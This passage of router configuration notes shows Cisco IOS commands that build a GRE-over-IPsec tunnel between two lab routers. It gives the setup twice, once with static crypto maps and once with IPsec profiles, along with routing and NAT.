[ROUTER-2) fa0/1: 192.168.2.254/24

[PC-2] eth0: 192.168.2.1/24

Using static crypto maps

ROUTER-1(config)# crypto isakmp policy 1
ROUTER-1(config-isakmp)# authentication pre-share
ROUTER-1(config-isakmp)# encryption aes
ROUTER-1(config-isakmp)# hash sha
ROUTER-1(config-isakmp)# group 2
ROUTER-1(config-isakmp)# lifetime 86400
ROUTER-1(config)# crypto isakmp aggressive-mode disable
ROUTER-1(config)# crypto isakmp key 0 SECRET_KEY address 12.12.12.2
ROUTER-1(config)# crypto isakmp enable
ROUTER-1(config)# ip access-list extended CRYPTO_ACL
ROUTER-1(config-ext-nacl)# permit gre host 12.12.12.1 host 12.12.12.2
ROUTER-1(config)# crypto ipsec transform-set TRANSFORM_SET esp-aes esp-sha-hmac
ROUTER-1(config)# crypto map CRYPTO_MAP 1 ipsec-isakmp
ROUTER-1(config-crypto-map)# set peer 12.12.12.2
ROUTER-1(config-crypto-map)# match address CRYPTO_ACL
ROUTER-1(config-crypto-map)# set transform-set TRANSFORM_SET
ROUTER-1(config-crypto-map)# set pfs group2
ROUTER-1(config)# interface fa0/0
ROUTER-1(config-if)# crypto map CRYPTO_MAP
ROUTER-1(config-if)# ip nat outside
ROUTER-1(config)# interface fa0/1
ROUTER-1(config-if)# ip nat inside
ROUTER-1(config)# interface tu0
ROUTER-1(config-if)# ip address 12.0.0.1 255.255.255.0
ROUTER-1(config-if)# tunnel source fa0/0
ROUTER-1(config-if)# tunnel destination 12.12.12.2
ROUTER-1(config)# ip route 192.168.2.0 255.255.255.0 12.0.0.2
ROUTER-1(config)# ip route 0.0.0.0 0.0.0.0 12.12.12.2
ROUTER-1(config)# ip access-list extended ACL_NAT
ROUTER-1(config-ext-nacl)# permit ip any any
ROUTER-1(config)# ip nat inside source list ACL_NAT interface fa0/0 overload
ROUTER-2(config)# crypto isakmp policy 1
ROUTER-2(config-isakmp)# authentication pre-share
ROUTER-2(config-isakmp)# encryption aes
ROUTER-2(config-isakmp)# hash sha
ROUTER-2(config-isakmp)# group 2
ROUTER-2(config-isakmp)# lifetime 86400
ROUTER-2(config)# crypto isakmp aggressive-mode disable
ROUTER-2(config)# crypto isakmp key 0 SECRET_KEY address 12.12.12.1
ROUTER-2(config)# crypto isakmp enable
ROUTER-2(config)# ip access-list extended CRYPTO_ACL
ROUTER-2(config-ext-nacl)# permit gre host 12.12.12.2 host 12.12.12.1
ROUTER-2(config)# crypto ipsec transform-set TRANSFORM_SET esp-aes esp-sha-hmac
ROUTER-2(config)# crypto map CRYPTO_MAP 1 ipsec-isakmp
ROUTER-2(config-crypto-map)# set peer 12.12.12.1
ROUTER-2(config-crypto-map)# match address CRYPTO_ACL
ROUTER-2(config-crypto-map)# set transform-set TRANSFORM_SET
ROUTER-2(config-crypto-map)# set pfs group2
ROUTER-2(config)# interface fa0/0
ROUTER-2(config-if)# crypto map CRYPTO_MAP
ROUTER-2(config-if)# ip nat outside
ROUTER-2(config)# interface fa0/1
ROUTER-2(config-if)# ip nat inside
ROUTER-2(config)# interface tu0
ROUTER-2(config-if)# ip address 12.0.0.2 255.255.255.0
ROUTER-2(config-if)# tunnel source fa0/0
ROUTER-2(config-if)# tunnel destination 12.12.12.1
ROUTER-2(config)# ip route 192.168.1.0 255.255.255.0 12.0.0.1
ROUTER-2(config)# ip route 0.0.0.0 0.0.0.0 12.12.12.1
ROUTER-2(config)# ip access-list extended ACL_NAT
ROUTER-2(config-ext-nacl)# permit ip any any
ROUTER-2(config)# ip nat inside source list ACL_NAT interface fa0/0 overload

Using profiles

ROUTER-1(config)# crypto isakmp policy 1
ROUTER-1(config-isakmp)# authentication pre-share
ROUTER-1(config-isakmp)# encryption aes
ROUTER-1(config-isakmp)# hash sha
ROUTER-1(config-isakmp)# group 2
ROUTER-1(config-isakmp)# lifetime 86400
ROUTER-1(config)# crypto isakmp aggressive-mode disable
ROUTER-1(config)# crypto isakmp key 0 SECRET_KEY address 12.12.12.2
ROUTER-1(config)# crypto isakmp enable
ROUTER-1(config)# crypto ipsec transform-set TRANSFORM_SET esp-aes esp-sha-hmac
ROUTER-1(config)# crypto ipsec profile PROFILE
ROUTER-1(config-profile)# set transform-set TRANSFORM_SET
ROUTER-1(config-profile)# set pfs group2
ROUTER-1(config)# interface fa0/0
ROUTER-1(config-if)# ip nat outside
ROUTER-1(config)# interface fa0/1
ROUTER-1(config-if)# ip nat inside
ROUTER-1(config)# interface tu0
ROUTER-1(config-if)# ip address 12.0.0.1 255.255.255.0
ROUTER-1(config-if)# tunnel source fa0/0
ROUTER-1(config-if)# tunnel destination 12.12.12.2
ROUTER-1(config-if)# tunnel protection ipsec profile PROFILE
ROUTER-1(config)# ip route 192.168.2.0 255.255.255.0 12.0.0.2
ROUTER-1(config)# ip route 0.0.0.0 0.0.0.0 12.12.12.2
ROUTER-1(config)# ip access-list extended ACL_NAT
ROUTER-1(config-ext-nacl)# permit ip any any
ROUTER-1(config)# ip nat inside source list ACL_NAT interface fa0/0 overload
ROUTER-2(config)# crypto isakmp policy 1
ROUTER-2(config-isakmp)# authentication pre-share
ROUTER-2(config-isakmp)# encryption aes
ROUTER-2(config-isakmp)# hash sha
ROUTER-2(config-isakmp)# group 2
ROUTER-2(config-isakmp)# lifetime 86400
ROUTER-2(config)# crypto isakmp aggressive-mode disable
ROUTER-2(config)# crypto isakmp key 0 SECRET_KEY address 12.12.12.1
ROUTER-2(config)# crypto isakmp enable
ROUTER-2(config)# crypto ipsec transform-set TRANSFORM_SET esp-aes esp-sha-hmac
ROUTER-2(config)# crypto ipsec profile PROFILE
ROUTER-2(config-crypto-map)# set transform-set TRANSFORM_SET
ROUTER-2(config-crypto-map)# set pfs group2
ROUTER-2(config)# interface fa0/0
ROUTER-2(config-if)# ip nat outside
ROUTER-2(config)# interface fa0/1
ROUTER-2(config-if)# ip nat inside
ROUTER-2(config)# interface tu0
ROUTER-2(config-if)# ip address 12.0.0.2 255.255.255.0
ROUTER-2(config-if)# tunnel source fa0/0
ROUTER-2(config-if)# tunnel destination 12.12.12.1
ROUTER-2(config-if)# tunnel protection ipsec profile PROFILE
ROUTER-2(config)# ip route 192.168.1.0 255.255.255.0 12.0.0.1
ROUTER-2(config)# ip route 0.0.0.0 0.0.0.0 12.12.12.1
ROUTER-2(config)# ip access-list extended ACL_NAT
ROUTER-2(config-ext-nacl)# permit ip any any
ROUTER-2(config)# ip nat inside source list ACL_NAT interface fa0/0 overload